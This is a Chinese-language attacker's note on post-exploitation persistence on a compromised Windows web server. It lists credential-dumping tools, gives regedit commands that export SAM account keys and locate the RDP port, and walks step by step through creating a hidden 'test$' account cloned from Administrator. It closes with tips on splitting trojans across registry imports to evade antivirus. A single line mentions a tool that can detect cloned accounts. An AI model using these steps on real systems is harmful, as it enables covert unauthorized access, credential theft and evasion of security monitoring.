WAF创建账号绕过
除此之外要注意的,在有了webshell权限后在敏感操作(一些命令)时,例如360会有提示警告
解决
先取本地明文密码哈希值
工具
lazagne
getpass
KIWICMD
可能可以读到web站点中间件的IUSER账户(默认的匿名访问)
采用注册表导入导出的方法
两个注册表内容是是权限和密码
也就是把管理员权限给一个咱们自己创建的知道密码的账户
一、注册表导出
命令行导出:
regedit /e c:\test.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
安静模式导入:regedit /s c:\test.reg
注册表相关操作可查看:https://www.cnblogs.com/zmwgz/p/10826478.html
查看3389端口
先导出
regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
然后
查看导出的文件,再用find查带这个PortNumber字段的3389端口
type c:\\tsport.reg | find "PortNumber"
二、建立隐藏帐号
1、CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。
PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。
2、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。
3、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。
4、扎到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。
5、分别test$和“000003EC导出到桌面,删除test$用户 net user test$ /del
6、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。
使用D盾web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号,如果查不出来,可以克隆中间件帐号
补充
现在很多的木马,运行过程中,以一些启动项的形式(msconfig),或者以服务方式加载,以驱动方式加载,以注册表加载,这里面都是杀毒软件在时刻监听,一运行就会报警,因此,现在比较先进的木马,都是先拆分开,绑定注册表,分多次执行木马,运行之后的木马再导入注册表(WINRAR高级功能中就可以实现)